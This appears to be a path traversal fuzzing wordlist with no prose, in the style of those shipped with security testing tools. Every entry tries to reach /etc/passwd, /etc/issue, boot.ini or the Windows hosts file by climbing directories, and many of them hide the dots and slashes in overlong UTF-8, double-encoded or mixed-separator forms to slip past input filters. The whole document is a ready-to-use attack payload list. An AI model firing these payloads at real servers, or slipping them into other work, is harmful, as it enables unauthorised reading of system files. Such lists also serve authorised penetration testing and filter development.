-%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c1%259c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c1%259c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c1%259c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c1%259c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c1%259c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c1%259cetc%25c1%259cpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c1%259c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c1%259c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c1%259c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c1%259c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c1%259c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c1%259cetc%25c1%259cissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c1%259c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c1%259c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c1%259c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c1%259c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c1%259c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c1%259cboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c1%259c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c1%259c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c1%259c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c1%259c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c1%259c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c0%25afetc%25c0%25afpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c0%25afetc%25c0%25afissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c0%25afboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c0%25af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c0%25afetc%25c0%25afpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c0%25af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c0%25afetc%25c0%25afissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c0%25af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c0%25afboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c0%25af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c0%25af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c0%25af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c0%25afetc%25c0%25afpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c0%25af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c0%25af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c0%25afetc%25c0%25afissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c0%25af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c0%25af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c0%25afboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c0%25af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c0%25af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c0%25af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c0%25af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c0%25af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c0%25afetc%25c0%25afpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c0%25af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c0%25af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c0%25af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c0%25afetc%25c0%25afissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c0%25af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c0%25af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c0%25af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c0%25afboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c0%25af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c0%25af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c0%25af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c0%25af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c0%25af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c0%25af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c0%25af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c0%25afetc%25c0%25afpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c0%25af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c0%25af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c0%25af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c0%25af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c0%25afetc%25c0%25afissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c0%25af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c0%25af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c0%25af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c0%25af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c0%25afboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c0%25af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c0%25af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c0%25af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c0%25af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c0%25af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c0%25af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c0%25af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c0%25af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c0%25af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c0%25afetc%25c0%25afpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c0%25af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c0%25af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c0%25af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c0%25af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c0%25af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c0%25afetc%25c0%25afissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c0%25af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c0%25af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c0%25af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c0%25af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c0%25af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c0%25afboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c0%25af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c0%25af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c0%25af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c0%25af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c0%25af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f0%80%80%afetc%f0%80%80%afpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f0%80%80%afetc%f0%80%80%afissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f0%80%80%afboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f0%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f0%80%80%afetc%f0%80%80%afpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f0%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f0%80%80%afetc%f0%80%80%afissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f0%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f0%80%80%afboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f0%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f0%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f0%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f0%80%80%afetc%f0%80%80%afpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f0%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f0%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f0%80%80%afetc%f0%80%80%afissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f0%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f0%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f0%80%80%afboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f0%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f0%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f0%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f0%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f0%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f0%80%80%afetc%f0%80%80%afpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f0%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f0%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f0%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f0%80%80%afetc%f0%80%80%afissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f0%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f0%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f0%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f0%80%80%afboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f0%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f0%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f0%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f0%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f0%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f0%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f0%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f0%80%80%afetc%f0%80%80%afpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f0%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f0%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f0%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f0%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f0%80%80%afetc%f0%80%80%afissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f0%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f0%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f0%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f0%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f0%80%80%afboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f0%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f0%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f0%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f0%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f0%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f0%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f0%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f0%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f0%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f0%80%80%afetc%f0%80%80%afpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f0%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f0%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f0%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f0%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f0%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f0%80%80%afetc%f0%80%80%afissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f0%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f0%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f0%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f0%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f0%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f0%80%80%afboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f0%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f0%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f0%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f0%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f0%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f8%80%80%80%afetc%f8%80%80%80%afissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f8%80%80%80%afboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f8%80%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f8%80%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f8%80%80%80%afetc%f8%80%80%80%afissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f8%80%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f8%80%80%80%afboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f8%80%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f8%80%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f8%80%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f8%80%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f8%80%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f8%80%80%80%afetc%f8%80%80%80%afissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f8%80%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f8%80%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f8%80%80%80%afboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f8%80%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f8%80%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f8%80%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f8%80%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f8%80%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f8%80%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f8%80%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f8%80%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f8%80%80%80%afetc%f8%80%80%80%afissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f8%80%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f8%80%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f8%80%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f8%80%80%80%afboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f8%80%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f8%80%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f8%80%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f8%80%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f8%80%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f8%80%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f8%80%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f8%80%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f8%80%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f8%80%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f8%80%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f8%80%80%80%afetc%f8%80%80%80%afissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f8%80%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f8%80%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f8%80%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f8%80%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f8%80%80%80%afboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f8%80%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f8%80%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f8%80%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f8%80%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f8%80%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f8%80%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f8%80%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f8%80%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f8%80%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f8%80%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f8%80%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f8%80%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f8%80%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f8%80%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f8%80%80%80%afetc%f8%80%80%80%afissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f8%80%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f8%80%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f8%80%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f8%80%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f8%80%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f8%80%80%80%afboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f8%80%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f8%80%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f8%80%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f8%80%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f8%80%80%80%af%fc%80%80%80%80%ae%fc%80%80%80%80%ae%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -..//etc//passwd -..//etc//issue -..//boot.ini -..//windows//system32//drivers//etc//hosts -..//..//etc//passwd -..//..//etc//issue -..//..//boot.ini -..//..//windows//system32//drivers//etc//hosts -..//..//..//etc//passwd -..//..//..//etc//issue -..//..//..//boot.ini -..//..//..//windows//system32//drivers//etc//hosts -..//..//..//..//etc//passwd -..//..//..//..//etc//issue -..//..//..//..//boot.ini -..//..//..//..//windows//system32//drivers//etc//hosts -..//..//..//..//..//etc//passwd -..//..//..//..//..//etc//issue -..//..//..//..//..//boot.ini -..//..//..//..//..//windows//system32//drivers//etc//hosts -..//..//..//..//..//..//etc//passwd -..//..//..//..//..//..//etc//issue -..//..//..//..//..//..//boot.ini -..//..//..//..//..//..//windows//system32//drivers//etc//hosts -..///etc///passwd -..///etc///issue -..///boot.ini -..///windows///system32///drivers///etc///hosts -..///..///etc///passwd -..///..///etc///issue -..///..///boot.ini -..///..///windows///system32///drivers///etc///hosts -..///..///..///etc///passwd -..///..///..///etc///issue -..///..///..///boot.ini -..///..///..///windows///system32///drivers///etc///hosts -..///..///..///..///etc///passwd -..///..///..///..///etc///issue -..///..///..///..///boot.ini -..///..///..///..///windows///system32///drivers///etc///hosts -..///..///..///..///..///etc///passwd -..///..///..///..///..///etc///issue -..///..///..///..///..///boot.ini -..///..///..///..///..///windows///system32///drivers///etc///hosts -..///..///..///..///..///..///etc///passwd -..///..///..///..///..///..///etc///issue -..///..///..///..///..///..///boot.ini -..///..///..///..///..///..///windows///system32///drivers///etc///hosts -..\\etc\\passwd -..\\etc\\issue -..\\boot.ini -..\\windows\\system32\\drivers\\etc\\hosts -..\\..\\etc\\passwd -..\\..\\etc\\issue -..\\..\\boot.ini -..\\..\\windows\\system32\\drivers\\etc\\hosts -..\\..\\..\\etc\\passwd -..\\..\\..\\etc\\issue -..\\..\\..\\boot.ini -..\\..\\..\\windows\\system32\\drivers\\etc\\hosts -..\\..\\..\\..\\etc\\passwd -..\\..\\..\\..\\etc\\issue -..\\..\\..\\..\\boot.ini -..\\..\\..\\..\\windows\\system32\\drivers\\etc\\hosts -..\\..\\..\\..\\..\\etc\\passwd -..\\..\\..\\..\\..\\etc\\issue -..\\..\\..\\..\\..\\boot.ini -..\\..\\..\\..\\..\\windows\\system32\\drivers\\etc\\hosts -..\\..\\..\\..\\..\\..\\etc\\passwd -..\\..\\..\\..\\..\\..\\etc\\issue -..\\..\\..\\..\\..\\..\\boot.ini -..\\..\\..\\..\\..\\..\\windows\\system32\\drivers\\etc\\hosts -..\\\etc\\\passwd -..\\\etc\\\issue -..\\\boot.ini -..\\\windows\\\system32\\\drivers\\\etc\\\hosts -..\\\..\\\etc\\\passwd -..\\\..\\\etc\\\issue -..\\\..\\\boot.ini -..\\\..\\\windows\\\system32\\\drivers\\\etc\\\hosts -..\\\..\\\..\\\etc\\\passwd -..\\\..\\\..\\\etc\\\issue -..\\\..\\\..\\\boot.ini -..\\\..\\\..\\\windows\\\system32\\\drivers\\\etc\\\hosts -..\\\..\\\..\\\..\\\etc\\\passwd -..\\\..\\\..\\\..\\\etc\\\issue -..\\\..\\\..\\\..\\\boot.ini -..\\\..\\\..\\\..\\\windows\\\system32\\\drivers\\\etc\\\hosts -..\\\..\\\..\\\..\\\..\\\etc\\\passwd -..\\\..\\\..\\\..\\\..\\\etc\\\issue -..\\\..\\\..\\\..\\\..\\\boot.ini -..\\\..\\\..\\\..\\\..\\\windows\\\system32\\\drivers\\\etc\\\hosts -..\\\..\\\..\\\..\\\..\\\..\\\etc\\\passwd -..\\\..\\\..\\\..\\\..\\\..\\\etc\\\issue -..\\\..\\\..\\\..\\\..\\\..\\\boot.ini -..\\\..\\\..\\\..\\\..\\\..\\\windows\\\system32\\\drivers\\\etc\\\hosts -../\etc/\passwd -../\etc/\issue -../\boot.ini -../\windows/\system32/\drivers/\etc/\hosts -../\../\etc/\passwd -../\../\etc/\issue -../\../\boot.ini -../\../\windows/\system32/\drivers/\etc/\hosts -../\../\../\etc/\passwd -../\../\../\etc/\issue -../\../\../\boot.ini -../\../\../\windows/\system32/\drivers/\etc/\hosts -../\../\../\../\etc/\passwd -../\../\../\../\etc/\issue -../\../\../\../\boot.ini -../\../\../\../\windows/\system32/\drivers/\etc/\hosts -../\../\../\../\../\etc/\passwd -../\../\../\../\../\etc/\issue -../\../\../\../\../\boot.ini -../\../\../\../\../\windows/\system32/\drivers/\etc/\hosts -../\../\../\../\../\../\etc/\passwd -../\../\../\../\../\../\etc/\issue -../\../\../\../\../\../\boot.ini -../\../\../\../\../\../\windows/\system32/\drivers/\etc/\hosts -..\/etc\/passwd -..\/etc\/issue -..\/boot.ini -..\/windows\/system32\/drivers\/etc\/hosts -..\/..\/etc\/passwd -..\/..\/etc\/issue -..\/..\/boot.ini -..\/..\/windows\/system32\/drivers\/etc\/hosts -..\/..\/..\/etc\/passwd -..\/..\/..\/etc\/issue -..\/..\/..\/boot.ini -..\/..\/..\/windows\/system32\/drivers\/etc\/hosts -..\/..\/..\/..\/etc\/passwd -..\/..\/..\/..\/etc\/issue -..\/..\/..\/..\/boot.ini -..\/..\/..\/..\/windows\/system32\/drivers\/etc\/hosts -..\/..\/..\/..\/..\/etc\/passwd -..\/..\/..\/..\/..\/etc\/issue -..\/..\/..\/..\/..\/boot.ini -..\/..\/..\/..\/..\/windows\/system32\/drivers\/etc\/hosts -..\/..\/..\/..\/..\/..\/etc\/passwd -..\/..\/..\/..\/..\/..\/etc\/issue -..\/..\/..\/..\/..\/..\/boot.ini -..\/..\/..\/..\/..\/..\/windows\/system32\/drivers\/etc\/hosts -../\/etc/\/passwd -../\/etc/\/issue -../\/boot.ini -../\/windows/\/system32/\/drivers/\/etc/\/hosts -../\/../\/etc/\/passwd -../\/../\/etc/\/issue -../\/../\/boot.ini -../\/../\/windows/\/system32/\/drivers/\/etc/\/hosts -../\/../\/../\/etc/\/passwd -../\/../\/../\/etc/\/issue -../\/../\/../\/boot.ini -../\/../\/../\/windows/\/system32/\/drivers/\/etc/\/hosts -../\/../\/../\/../\/etc/\/passwd -../\/../\/../\/../\/etc/\/issue -../\/../\/../\/../\/boot.ini -../\/../\/../\/../\/windows/\/system32/\/drivers/\/etc/\/hosts -../\/../\/../\/../\/../\/etc/\/passwd 